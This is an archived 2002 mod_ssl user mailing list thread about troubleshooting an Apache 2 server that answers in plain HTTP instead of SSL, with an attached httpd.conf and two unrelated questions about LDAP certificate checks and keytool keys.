______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 11:21:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA22757; Tue, 22 Jan 2002 11:20:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from photon.wildfalcon.com id LAA22724; Tue, 22 Jan 2002 11:19:11 +0100 (MET) Received: (qmail 7263 invoked by uid 500); 22 Jan 2002 11:19:59 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 22 Jan 2002 11:19:59 -0000 Date: Tue, 22 Jan 2002 11:19:59 +0000 (GMT) From: Laurie Young To: "'modssl-users@modssl.org'" Subject: Re: Apache 2 + SSL Problems In-Reply-To: <20020122112851.I5424@gecadsoftware.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Laurie Young X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 22 Jan 2002, Teodor Cimpoesu wrote: > > 0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02 ................ > > 0060 - 00 80 08 92 0d f4 b5 83-60 ae 0b fb 3b 92 08 79 ........`...;..y > > 0070 - 92 79 cf 8c c6 57 64 72-96 4c 0d 63 8d 1f 71 7f .y...Wdr.L.c..q. > > 0080 - 62 e3 b. > > SSL_connect:SSLv2/v3 write client hello A > > read from 0814B5A0 [08150B48] (7 bytes => 7 (0x7)) > > 0000 - 3c 21 44 4f 43 54 59 It looks like the server started to talk plain HTTP .......^ > maybe it falled back to NULL? Errr.... What does that mean? Laurie -- ================================================== Laurie Robert Young laurie@wildfalcon.com | laurie@doc.ic.ac.uk www.wildfalcon.com | www.doc.ic.ac.uk/~laurie ICQ UIN #20194782 ================================================== ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 11:28:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA23073; Tue, 22 Jan 2002 11:27:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id LAA23040; Tue, 22 Jan 2002 11:26:35 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id BFAD7BD2B; Tue, 22 Jan 2002 11:26:38 +0100 (CET) Date: Tue, 22 Jan 2002 11:26:38 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Apache 2 + SSL Problems Message-ID: <20020122102638.GA29140@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <20020122112851.I5424@gecadsoftware.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, Jan 22, 2002 at 11:19:59AM +0000, Laurie Young wrote: > On Tue, 22 Jan 2002, Teodor Cimpoesu wrote: > > > 0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02 ................ > > > 0060 - 00 80 08 92 0d f4 b5 83-60 ae 0b fb 3b 92 08 79 ........`...;..y > > > 0070 - 92 79 cf 8c c6 57 64 72-96 4c 0d 63 8d 1f 71 7f .y...Wdr.L.c..q. > > > 0080 - 62 e3 b. > > > SSL_connect:SSLv2/v3 write client hello A > > > read from 0814B5A0 [08150B48] (7 bytes => 7 (0x7)) > > > 0000 - 3c 21 44 4f 43 54 59 > It looks like the server started to talk plain HTTP .......^ > > maybe it falled back to NULL? > > Errr.... > > What does that mean? > This basically means that your server is speaking HTTP and _not_ HTTPS. Perhaps you have forgotten something like SSLEngine on in your vhost config. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 11:42:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA23671; Tue, 22 Jan 2002 11:41:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id LAA23640; Tue, 22 Jan 2002 11:40:22 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id FAA31981; Tue, 22 Jan 2002 05:46:03 -0500 Date: Tue, 22 Jan 2002 05:46:01 -0500 (EST) From: "R. DuFresne" To: Laurie Young cc: "'modssl-users@modssl.org'" Subject: Re: Apache 2 + SSL Problems In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users You might save some time here by showing your httpd.config. And of course you start your server with: apachectl startssl yes? Thanks, Ron DuFresne On Tue, 22 Jan 2002, Laurie Young wrote: > On Tue, 22 Jan 2002, Teodor Cimpoesu wrote: > > > 0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02 ................ > > > 0060 - 00 80 08 92 0d f4 b5 83-60 ae 0b fb 3b 92 08 79 ........`...;..y > > > 0070 - 92 79 cf 8c c6 57 64 72-96 4c 0d 63 8d 1f 71 7f .y...Wdr.L.c..q. > > > 0080 - 62 e3 b. > > > SSL_connect:SSLv2/v3 write client hello A > > > read from 0814B5A0 [08150B48] (7 bytes => 7 (0x7)) > > > 0000 - 3c 21 44 4f 43 54 59 > It looks like the server started to talk plain HTTP .......^ > > maybe it falled back to NULL? > > Errr.... > > What does that mean? > > Laurie > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 11:52:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA24185; Tue, 22 Jan 2002 11:51:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from antares.gecadsoftware.com id LAA24165; Tue, 22 Jan 2002 11:50:46 +0100 (MET) Received: (qmail 26413 invoked from network); 22 Jan 2002 10:59:14 -0000 Received: from unknown (HELO taz.gecadsoftware.com) (193.230.245.17) by antares.gecadsoftware.com with SMTP; 22 Jan 2002 10:59:13 -0000 Received: from teo.gecadsoftware.com ([193.230.245.169]) by taz.gecadsoftware.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id DFRCT4SH; Tue, 22 Jan 2002 12:49:21 +0200 Received: by teo.gecadsoftware.com (Postfix, from userid 501) id E71F51DE88; Tue, 22 Jan 2002 12:47:39 +0200 (EET) Date: Tue, 22 Jan 2002 12:47:39 +0200 From: Teodor Cimpoesu To: "'modssl-users@modssl.org'" Subject: Re: Apache 2 + SSL Problems Message-ID: <20020122124739.B6405@gecadsoftware.com> Mail-Followup-To: Teodor Cimpoesu , "'modssl-users@modssl.org'" References: <20020122112851.I5424@gecadsoftware.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.21i Organization: GeCAD Software (http://www.gecadsoftware.com) Comment: Worry less, RAV is watching! X-Operating-System: Linux 2.4.8-26mdk i686 up 16:30 X-Mailer: Mutt, man's best friend (http://www.mutt.org) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Teodor Cimpoesu X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Laurie! On Tue, 22 Jan 2002, Laurie Young wrote: > On Tue, 22 Jan 2002, Teodor Cimpoesu wrote: > > > 0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02 ................ > > > 0060 - 00 80 08 92 0d f4 b5 83-60 ae 0b fb 3b 92 08 79 ........`...;..y > > > 0070 - 92 79 cf 8c c6 57 64 72-96 4c 0d 63 8d 1f 71 7f .y...Wdr.L.c..q. > > > 0080 - 62 e3 b. > > > SSL_connect:SSLv2/v3 write client hello A > > > read from 0814B5A0 [08150B48] (7 bytes => 7 (0x7)) > > > 0000 - 3c 21 44 4f 43 54 59 > It looks like the server started to talk plain HTTP .......^ > > maybe it falled back to NULL? > > Errr.... > > What does that mean? it means your server was started with -DSSL (so it will listen on 443) but no SSLEngine On was present arround, or, you did all that but it failed to negociate a cipher (my wild guess), though then it shouldn't even talk cuz it isn't secure anymore. -- teodor ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 12:10:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA26524; Tue, 22 Jan 2002 12:09:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from photon.wildfalcon.com id MAA26497; Tue, 22 Jan 2002 12:08:36 +0100 (MET) Received: (qmail 7356 invoked by uid 500); 22 Jan 2002 12:09:25 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 22 Jan 2002 12:09:25 -0000 Date: Tue, 22 Jan 2002 12:09:25 +0000 (GMT) From: Laurie Young To: "'modssl-users@modssl.org'" Subject: Re: Apache 2 + SSL Problems In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-824705464-1011701365=:7276" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Laurie Young X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --8323328-824705464-1011701365=:7276 Content-Type: TEXT/PLAIN; charset=US-ASCII I have tried starting it with ./apachectrl start and with ./apachectrl startssl both give the same errors It would be good if someone could have a look at my httpd.config file, which I have included as an attachment Laurie On Tue, 22 Jan 2002, R. DuFresne wrote: > > You might save some time here by showing your httpd.config. > > And of course you start your server with: apachectl startssl > > yes? > > Thanks, > > Ron DuFresne > > On Tue, 22 Jan 2002, Laurie Young wrote: > > > On Tue, 22 Jan 2002, Teodor Cimpoesu wrote: > > > > 0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02 ................ > > > > 0060 - 00 80 08 92 0d f4 b5 83-60 ae 0b fb 3b 92 08 79 ........`...;..y > > > > 0070 - 92 79 cf 8c c6 57 64 72-96 4c 0d 63 8d 1f 71 7f .y...Wdr.L.c..q. > > > > 0080 - 62 e3 b. > > > > SSL_connect:SSLv2/v3 write client hello A > > > > read from 0814B5A0 [08150B48] (7 bytes => 7 (0x7)) > > > > 0000 - 3c 21 44 4f 43 54 59 > > It looks like the server started to talk plain HTTP .......^ > > > maybe it falled back to NULL? > > > > Errr.... > > > > What does that mean? > > > > Laurie > > > > -- ================================================== Laurie Robert Young laurie@wildfalcon.com | laurie@doc.ic.ac.uk www.wildfalcon.com | www.doc.ic.ac.uk/~laurie ICQ UIN #20194782 ================================================== --8323328-824705464-1011701365=:7276 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="httpd.conf" Content-ID: Content-Description: Content-Disposition: attachment; filename="httpd.conf" Content-Transfer-Encoding: BASE64 IyMjIyMjIyMjIyNEU08gTW9kdWxlcyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBM b2FkTW9kdWxlIGZvb19tb2R1bGUgbW9kdWxlcy9tb2RfZm9vLnNvDQoNCg0K DQojIyMjIyMjIyMjI1NlcnZlciBXaWRlIENvbmZpZyMjIyMjIyMjIw0KU2Vy dmVyUm9vdCAiL2hvbWVzL2xhdXJpZS9iaW4vYXBhY2hlMiINClBpZEZpbGUg bG9ncy9odHRwZC5waWQNClRpbWVvdXQgMzAwDQpMaXN0ZW4gODA4MA0KTGlz dGVuIDQ0Mw0KDQpVc2VyIGxhdXJpZQ0KDQpLZWVwQWxpdmUgT24NCk1heEtl ZXBBbGl2ZVJlcXVlc3RzIDEwMA0KS2VlcEFsaXZlVGltZW91dCAxNQ0KQnJv d3Nlck1hdGNoICJNb3ppbGxhLzIiIG5va2VlcGFsaXZlDQpCcm93c2VyTWF0 Y2ggIk1TSUUgNFwuMGIyOyIgbm9rZWVwYWxpdmUgZG93bmdyYWRlLTEuMCBm b3JjZS1yZXNwb25zZS0xLjANCg0KDQo8SWZNb2R1bGUgcHJlZm9yay5jPg0K U3RhcnRTZXJ2ZXJzICAgICAgICAgNQ0KTWluU3BhcmVTZXJ2ZXJzICAgICAg NQ0KTWF4U3BhcmVTZXJ2ZXJzICAgICAxMA0KTWF4Q2xpZW50cyAgICAgICAg IDE1MA0KTWF4UmVxdWVzdHNQZXJDaGlsZCAgMA0KPC9JZk1vZHVsZT4NCg0K PElmTW9kdWxlIHRocmVhZGVkLmM+DQpTdGFydFNlcnZlcnMgICAgICAgICAz DQpNYXhDbGllbnRzICAgICAgICAgMTUwDQpNaW5TcGFyZVRocmVhZHMgICAg IDI1DQpNYXhTcGFyZVRocmVhZHMgICAgIDc1IA0KVGhyZWFkc1BlckNoaWxk ICAgICAyNQ0KTWF4UmVxdWVzdHNQZXJDaGlsZCAgMA0KPC9JZk1vZHVsZT4N Cg0KDQojIyMjIyMjIyNEZWZhdWx0IFNlcnZlciBDb25maWcNClNlcnZlckFk bWluIGljZW5pQGxlc2MuaWMuYWMudWsNCkRvY3VtZW50Um9vdCAiL2hvbWVz L2xhdXJpZS9iaW4vYXBhY2hlMi9odGRvY3MiDQoNCkRpcmVjdG9yeUluZGV4 IGluZGV4Lmh0bWwNCg0KVHlwZXNDb25maWcgY29uZi9taW1lLnR5cGVzDQpE ZWZhdWx0VHlwZSB0ZXh0L3BsYWluDQo8SWZNb2R1bGUgbW9kX21pbWVfbWFn aWMuYz4NCiAgICBNSU1FTWFnaWNGaWxlIGNvbmYvbWFnaWMNCjwvSWZNb2R1 bGU+DQoNCkVycm9yTG9nIGxvZ3MvZXJyb3JfbG9nDQpMb2dMZXZlbCB3YXJu DQpMb2dGb3JtYXQgIiVoICVsICV1ICV0IFwiJXJcIiAlPnMgJWIgXCIle1Jl ZmVyZXJ9aVwiIFwiJXtVc2VyLUFnZW50fWlcIiIgY29tYmluZWQNCkxvZ0Zv cm1hdCAiJWggJWwgJXUgJXQgXCIlclwiICU+cyAlYiIgY29tbW9uDQpMb2dG b3JtYXQgIiV7UmVmZXJlcn1pIC0+ICVVIiByZWZlcmVyDQpMb2dGb3JtYXQg IiV7VXNlci1hZ2VudH1pIiBhZ2VudA0KQ3VzdG9tTG9nIGxvZ3MvYWNjZXNz X2xvZyBjb21iaW5lZA0KDQo8RGlyZWN0b3J5IC8+DQogICAgT3B0aW9ucyBG b2xsb3dTeW1MaW5rcw0KICAgIEFsbG93T3ZlcnJpZGUgTm9uZQ0KICAgIERp cmVjdG9yeUluZGV4IGluZGV4Lmh0bWwJDQogICAgT3JkZXIgYWxsb3csZGVu eQ0KICAgIEFsbG93IGZyb20gYWxsDQo8L0RpcmVjdG9yeT4NCg0KQWxpYXMg L21hbnVhbCAiL2hvbWVzL2xhdXJpZS9iaW4vYXBhY2hlMi9tYW51YWwiDQoN CjxEaXJlY3RvcnkgIi9ob21lcy9sYXVyaWUvYmluL2FwYWNoZTIvbWFudWFs Ij4NCiAgICBPcHRpb25zIEluZGV4ZXMgRm9sbG93U3ltTGlua3MgTXVsdGlW aWV3cw0KICAgIEFsbG93T3ZlcnJpZGUgTm9uZQ0KICAgIE9yZGVyIGFsbG93 LGRlbnkNCiAgICBBbGxvdyBmcm9tIGFsbA0KPC9EaXJlY3Rvcnk+DQoNCg0K DQoNCjxWaXJ0dWFsSG9zdCAxNDYuMTY5LjQuMTM6NDQzPg0KRG9jdW1lbnRS b290IC9ob21lcy9sYXVyaWUvYmluL2FwYWNoZTIvc3NsZG9jcw0KU2VydmVy TmFtZSBzdG9uZS5kb2MuaWMuYWMudWsNClNlcnZlckFkbWluIGxhdXJpZUBk b2MuaWMuYWMudWsNCkVycm9yTG9nIC9ob21lcy9sYXVyaWUvYmluL2FwYWNo ZTIvbG9ncy9zc2xfZXJyb3JfbG9nDQpDdXN0b21Mb2cgbG9ncy9zc2xfYWNj ZXNzX2xvZyBjb21iaW5lZA0KDQpTU0xFbmdpbmUgb24NClNTTFByb3RvY29s IGFsbA0KU1NMQ2VydGlmaWNhdGVGaWxlIC9ob21lcy9sYXVyaWUvYmluL2Fw YWNoZTIva2V5cy9zZXJ2ZXIuY3J0DQpTU0xDZXJ0aWZpY2F0ZUtleUZpbGUg L2hvbWVzL2xhdXJpZS9iaW4vYXBhY2hlMi9rZXlzL3NlcnZlci5rZXkNCjwv VmlydHVhbEhvc3Q+DQoNCg0KDQoNCg0KDQoNCg0K --8323328-824705464-1011701365=:7276-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 12:33:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA27847; Tue, 22 Jan 2002 12:32:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from antares.gecadsoftware.com id MAA27784; Tue, 22 Jan 2002 12:31:13 +0100 (MET) Received: (qmail 30690 invoked from network); 22 Jan 2002 11:39:45 -0000 Received: from unknown (HELO taz.gecadsoftware.com) (193.230.245.17) by antares.gecadsoftware.com with SMTP; 22 Jan 2002 11:39:45 -0000 Received: from teo.gecadsoftware.com ([193.230.245.169]) by taz.gecadsoftware.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id DFRCTVCW; Tue, 22 Jan 2002 13:29:57 +0200 Received: by teo.gecadsoftware.com (Postfix, from userid 501) id 712471DED7; Tue, 22 Jan 2002 13:28:16 +0200 (EET) Date: Tue, 22 Jan 2002 13:28:16 +0200 From: Teodor Cimpoesu To: "'modssl-users@modssl.org'" Subject: Re: Apache 2 + SSL Problems Message-ID: <20020122132816.D6405@gecadsoftware.com> Mail-Followup-To: Teodor Cimpoesu , "'modssl-users@modssl.org'" References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.21i Organization: GeCAD Software (http://www.gecadsoftware.com) Comment: Worry less, RAV is watching! X-Operating-System: Linux 2.4.8-26mdk i686 up 16:30 X-Mailer: Mutt, man's best friend (http://www.mutt.org) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Teodor Cimpoesu X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Laurie! On Tue, 22 Jan 2002, Laurie Young wrote: > I have tried starting it with > ./apachectrl start > and with > ./apachectrl startssl > > both give the same errors > > It would be good if someone could have a look at my httpd.config file, > which I have included as an attachment > I don't remember if you said how did you compiled the SSL support (deleted the mesgs) was it as a loadable module? If so, add a LoadModule directive, cause: > PidFile logs/httpd.pid > Timeout 300 > Listen 8080 > Listen 443 ....^ you listen on 443 either mod_ssl is loaded or not. > .................^ virtual host where sslengine is on sais a different IP than what you've tried from command line (namely 127.0.0.1 aka localhost). So, 1st, if your mod_ssl is loadable then load it :) then test ssl by connecting to the above ip addr for testing. gl -- teodor ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 12:48:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA28503; Tue, 22 Jan 2002 12:47:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from photon.wildfalcon.com id MAA28466; Tue, 22 Jan 2002 12:46:25 +0100 (MET) Received: (qmail 7409 invoked by uid 500); 22 Jan 2002 12:47:13 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 22 Jan 2002 12:47:13 -0000 Date: Tue, 22 Jan 2002 12:47:13 +0000 (GMT) From: Laurie Young To: "'modssl-users@modssl.org'" Subject: Re: Apache 2 + SSL Problems In-Reply-To: <20020122132816.D6405@gecadsoftware.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Laurie Young X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 22 Jan 2002, Teodor Cimpoesu wrote: > Hi Laurie! > On Tue, 22 Jan 2002, Laurie Young wrote: > > > I have tried starting it with > > ./apachectrl start > > and with > > ./apachectrl startssl > > > > both give the same errors > > > > It would be good if someone could have a look at my httpd.config file, > > which I have included as an attachment > > > I don't remember if you said how did you compiled the SSL support (deleted > the mesgs) was it as a loadable module? If so, add a LoadModule directive, > cause: I had some problems with DSO (apxs insisted on producing .la files instead of .dso files) so I gave up on that and compilied modssl into the main apache binary > > > PidFile logs/httpd.pid > > Timeout 300 > > Listen 8080 > > Listen 443 > ....^ you listen on 443 either mod_ssl is loaded or not. I wasn't sure if I had to explicitly tel the server to listen to 443. Do I? > > > > .................^ virtual host where sslengine is on sais a different IP > than what you've tried from command line (namely 127.0.0.1 aka localhost). 146.169.4.13 is the real world IP for the machine I am running on, I have tried connecting to localhost, 127.0.0.1, 146.169.3.14 and stone.doc.ic.ac.uk (the FQDN of the host) but all have the same error ;-( Laurie -- ================================================== Laurie Robert Young laurie@wildfalcon.com | laurie@doc.ic.ac.uk www.wildfalcon.com | www.doc.ic.ac.uk/~laurie ICQ UIN #20194782 ================================================== ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 19:03:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA16680; Tue, 22 Jan 2002 19:02:35 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA16652; Tue, 22 Jan 2002 19:01:47 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 2DE8F4CE746; Tue, 22 Jan 2002 19:01:46 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0MFvgK80414; Tue, 22 Jan 2002 16:57:42 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from door.cgey.com id OAA03441; Tue, 22 Jan 2002 14:53:36 +0100 (MET) Received: from prenoms.capgemini.fr (sdcnt1.cgey.com [194.2.91.200]) by door.cgey.com (8.12.1/8.12.1) with ESMTP id g0MDrSpB028752 for ; Tue, 22 Jan 2002 14:53:29 +0100 (MET) Received: from prenoms.capgemini.fr (localhost [127.0.0.1]) by prenoms.capgemini.fr (8.9.3/8.9.3) with ESMTP id OAA23085 for ; Tue, 22 Jan 2002 14:53:29 +0100 (MET) Received: from aezzahrap ([213.41.95.98]) by prenoms.capgemini.fr (8.9.3/8.9.3) with SMTP id OAA23041 for ; Tue, 22 Jan 2002 14:53:28 +0100 (MET) Message-ID: <003701c1a34b$e35074a0$7f0aa8c0@aezzahrap> From: "ezzahraoui amal" To: Subject: certificate authentication within ldap and mod_ssl Date: Tue, 22 Jan 2002 14:50:56 +0100 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0034_01C1A354.32E1BE40" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "ezzahraoui amal" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users C'est un message de format MIME en plusieurs parties. ------=_NextPart_000_0034_01C1A354.32E1BE40 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi, I want to use apache webserver as a reverse proxy + mod_ssl to handle = user authentication within a certificate. how can i use ldap to do CRL = verification and certificates attributes mapping into the ldap. is it = possible with mod_ssl? is there something to code?=20 Thank you. ------=_NextPart_000_0034_01C1A354.32E1BE40 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi,
I want to use apache webserver as a reverse = proxy +=20 mod_ssl to handle user authentication within a certificate. how can i = use ldap=20 to do CRL verification and certificates attributes mapping into the = ldap. is it=20 possible with mod_ssl? is there something to code? 
 
Thank you.
 
 
------=_NextPart_000_0034_01C1A354.32E1BE40-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 19:37:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA18416; Tue, 22 Jan 2002 19:34:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA18397; Tue, 22 Jan 2002 19:33:43 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 31A274CE73A; Tue, 22 Jan 2002 19:33:42 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0MIUS682808; Tue, 22 Jan 2002 19:30:28 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from i3t-adsl id RAA10675; Tue, 22 Jan 2002 17:16:52 +0100 (MET) Received: from [10.0.1.112] by i3t-adsl (ArGoSoft Mail Server, Version 1.62 (1.6.2.4)); Tue, 22 Jan 2002 17:16:49 +0100 Message-ID: <003501c1a360$324587d0$7001000a@IntegralTrust> From: "Laurent De Lopez" To: Subject: pb with keytool and modssl plz help Date: Tue, 22 Jan 2002 17:16:48 +0100 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0032_01C1A368.93170450" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Laurent De Lopez" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users C'est un message de format MIME en plusieurs parties. ------=_NextPart_000_0032_01C1A368.93170450 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi all, I created a ssl key with keytool, to work with Resin. all worked well, = but now we want to use Apache as webserver, and it uses openssl. The = problem is that openssl cannot read the keystore generated with keytool. = Does someone know how to get my private key generated with keytool to = work with openssl? Or is it possible to make apache work with keytool ?=20 Thx for any answer !!!=20 ------=_NextPart_000_0032_01C1A368.93170450 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi all,
 
I created a ssl key with keytool, to = work with=20 Resin. all worked well, but now we want to use Apache as webserver, and = it uses=20 openssl. The problem is that openssl cannot read the keystore generated = with=20 keytool. Does someone know how to get my private key generated with = keytool=20 to work with openssl? Or is it possible to make apache work with keytool = ?=20
 
Thx for any answer !!! =
------=_NextPart_000_0032_01C1A368.93170450-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 20:56:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA21932; Tue, 22 Jan 2002 20:55:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from palrel10.hp.com id UAA21897; Tue, 22 Jan 2002 20:54:16 +0100 (MET) Received: from xparelay2.corp.hp.com (xparelay2.corp.hp.com [15.58.137.112]) by palrel10.hp.com (Postfix) with ESMTP id 1C9A9C004A5 for ; Tue, 22 Jan 2002 11:54:04 -0800 (PST) Received: from xpabh1.corp.hp.com (xpabh1.corp.hp.com [15.58.136.191]) by xparelay2.corp.hp.com (Postfix) with ESMTP id 6D50D193 for ; Tue, 22 Jan 2002 11:53:12 -0800 (PST) Received: by xpabh1.corp.hp.com with Internet Mail Service (5.5.2653.19) id ; Tue, 22 Jan 2002 11:54:03 -0800 Message-ID: From: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" To: "'modssl-users@modssl.org'" Subject: RE: Apache 2 + SSL Problems Date: Tue, 22 Jan 2002 11:53:54 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C1A37E.857AD130" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: 